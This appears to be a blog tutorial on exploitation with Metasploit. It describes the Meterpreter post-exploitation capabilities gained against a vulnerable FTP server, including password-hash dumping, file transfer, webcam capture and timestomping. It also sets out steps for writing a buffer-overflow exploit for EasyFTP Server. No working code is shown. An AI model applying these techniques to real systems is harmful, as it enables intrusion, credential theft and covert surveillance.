Skip to main content

Advanced Exploitation Techniques - Part 4



Case Studies on Advanced Exploitation Techniques

 Tutorial 1 – Hello world, some history

Welcome again, so far we have been studying and hacking into systems by exploiting the discovered vulnerabilities. Here in this module we will be going through different studies, which have been put together as advanced techniques so that we can grab more knowledge in exploit development and the peripherals of this field.

Some History

Buffer overflow exploits are extremely dangerous if they have been successfully exploited and the attacker is making a good use of the exploited vulnerability. A long time back, somewhere around 1988, there was a Worm! So far, it is considered to be first worm since it gained so much media coverage and popularity just because of its effects, and it was written by a student that caused damage of approximately hundreds million dollars.

We have been exploring enough on egg hunters and we have also gone through the exploitation techniques, like buffer overflows. However, there is much more to explore in exploitation; there are many other ways of exploiting an application, however, the method of detecting the vulnerability doesn’t differ 100%.

So what are other ways of exploitations or what are the other types of vulnerabilities that can lead to system compromises? Deploying rootkits or anything that causes much damage to the victim’s machine or simply owning the box.

There are many other ways which an attacker can use for gaining access to the victim machine if the following vulnerabilities can be exploited, which can lead to exploitation of systems.

                    ● Heap Overflows
                    ● Format String
                    ● SQL Injections
                    ● Client Side Attacks
                    ● IE Exploitation

These names might be familiar to you, however, they are the most common and still cause serious damages to the systems. However, techniques like Trojan horses, social engineering, and password attack may still work but nowadays these types of attacks don’t help you out in real world hacking attempts.

The days have passed where you simply run a password attack and gain access to the routers and Windows machines, or send a file that compromises the system. This is legacy.

However, personally, I have seen in live pen testing where the password for a cisco router was still “cisco” and the password for a web application admin panel was still “admin” so idiots are still working in the field of web development and network or system administration.

Sometimes it does happen that you can exploit a vulnerability but the payload you are using doesn’t help you make more damage to the system or fully compromise the system.

Let’s pay attention to the great payload and most loving part of Metasploit called Meterpreter We would exploit a known vulnerability and then we explore what advanced options we have to explore with Meterpreter.

Case Study – Meterpreter & PCManFTPD Vulnerability

We have downloaded and installed the PCManFTPD server on a Windows XP machine and we ran the Metasploit framework to look for an available exploit. Below screen shows the configured options for exploiting this vulnerability



Okay, here you can see we have one Meterpreter session opened on the victim machine. So what we can do now after exploiting the vulnerability? Here it’s worthwhile showing the power of Meterpreter. Below are the available options for us to play with on this system.

            ● Core Commands
            ● File System Commands
            ● Networking Commands
            ● System Commands
            ● User Interface Commands
            ● Webcam Commands
            ● Elevate Commands
            ● Password Database Commands
            ● Timestomp commands

Core Commands


File System Commands


Networking Commands


System Commands


User Interface Commands


Web Cam Commands



Elevate, Password & Timestomp Commands


That’s the power this awesome payload Metasploit has. Okay so what can we do with this? We can dump the content of SAM database and crack password later while using Metasploit itself.

We can download or upload any files to and from the victim’s system and we can even see the webcam snap and videos. You can try and practice all of these commands on your own by simply exploiting any known vulnerability as we have shown in this case.

Exploring Meterpreter is a detailed exercise. If you want to be a master of Meterpreter and want to learn more on this please post on the forum for the workshop demand and we will develop one dedicated workshop for Meterpreter including other key topics so that you can enhance your skill of after hacks! Please post on forum for the workshop request.

Case Study, Exploit Development & Metasploit

Some people still believe that Metasploit is a penetration testing and hacking tool, however it is and indeed most used and maintained tool in ethical hacking & penetration testing but it is not just for hacking into systems.

A security researcher uses this wonderful tool for exploit development, as well. Now, you might think how can we use this tool for exploit development? So here we will run through quick exploit development with Metasploit for the EasyFTP Server as a bonus.


We will follow quick and short steps to show how this tool can be used for exploit development. As you have already seen at the beginning of the workshop, we used Metasploit for fuzzing so I will not explain that again here. You have to do it on your own and don’t copy the required info from available exploits. Okay we will run an exercise here for you to complete this exploit development for the known vulnerability of EasyFTP Server.

Exercise 1 – Find the rabbit’s foot

Step 1

Use Metasploit for fuzzing, find the point where the application is crashed and post the details on the forum how you did and your main task in step one is finding the offset. So post the offset value you find. These may be different on different machines.

You can download the vulnerable application from the below download link, if you need any help practicing on the vulnerable help, please post on the forum so we can help you, however, don’t give up trying on your own first.

Download Link: http://www.exploit-db.com/exploits/14402/

Step 2

Now, arrange the stack and overwrite the EIP register. If you have read module one and understood the exploit development explained in that module then I believe you should be able to find this with small efforts. Find the ESP location.

Post your story on the forum how you obtained and overwrite the EIP.

Step 3

Now, you should have the following known with you.

1 – Evilbuffer to send for crashing
2 – Offset value
3 – Find the ESP location

Step 4

Get your shell code ready, you can generate one from Metasploit or use the one I use in module 1.

Submit your success story on the forum.

Step 5

We have shown high level steps for developing the EasyFTP Server exploit, you can use any technique you want, for your ease you can use Mona.py for everything you want, however, do submit your techniques that you used for developing the exploit.

And don’t forget to submit your PoC Code for others to learn, I developed one for you guys and will post once requested by anyone. You can ask questions via forum if you are facing any difficulty in coding the PoC.

Popular posts from this blog

Bypassing Web Application Firewall Part - 2

WAF Bypassing with SQL Injection HTTP Parameter Pollution & Encoding Techniques HTTP Parameter Pollution is an attack where we have the ability to override or add HTTP GET/POST parameters by injecting string delimiters. HPP can be distinguished in two categories, client-side and server-side, and the exploitation of HPP can result in the following outcomes:  •Override existing hardcoded HTTP parameters  •Modify the application behaviors   •Access and potentially exploit uncontrollable variables  • Bypass input validation checkpoints and WAF rules HTTP Parameter Pollution – HPP   WAFs, which is the topic of interest, many times perform query string parsing before applying the filters to this string. This may result in the execution of a payload that an HTTP request can carry. Some WAFs analyze only one parameter from the string of the request, most of the times the first or the last, which may result in a bypass of the WAF filters, and execution of the pa...
Read more

Bypassing Web Application Firewall Part - 4

Securing WAF and Conclusion DOM Based XSS DOM based XSS is another type of XSS that is also used widely, and we didn’t discuss it in module 3. The DOM, or Document Object Model, is the structural format used to represent documents in a browser. The DOM enables dynamic scripts such as JavaScript to reference components of the document such as a form field or a session cookie, and it is also a security feature that limits scripts on different domains from obtaining cookies for other domains. Now, the XSS attacks based on this is when the payload that we inject is executed as a result of modifying the DOM environment in the victim’s browser, so that the code runs in an unexpected way. By this we mean that in contrast with the other two attacks, here the page that the victim sees does not change, but the injected code is executed differently because of the modifications that have been done in the DOM environment, that we said earlier. In the other XSS attacks, we saw the injected code was ...
Read more

Hacking - Best OF Reverse Engineering - Part7

How to Disassemble and Debug Executable Programs on Linux, Windows and Mac OS X? The Interactive Disassembler Professional (IDA Pro) is an extremely powerful disassembler distributed by Hex-Rays. Although IDA Pro is not the only disassembler, it is the disassembler of choice for many malware analysts, reverse engineers, and vulnerability analysts. The program is published by Hex-Rays (http://www.hex-rays.com), which provides a free version for noncommercial uses that is one version less than the current paid version. It is now version 5.0. IDA Pro will disassemble an entire program and perform tasks such as function discovery, stack analysis, local variable identification, and much more. IDA Pro includes extensive code signatures within its Fast Library Identification and Recognition Technology (FLIRT), which allows it to recognize and label a disassembled function, especially library code added by a compiler. IDA Pro is meant to be interactive, and all aspects of its disasse...
Read more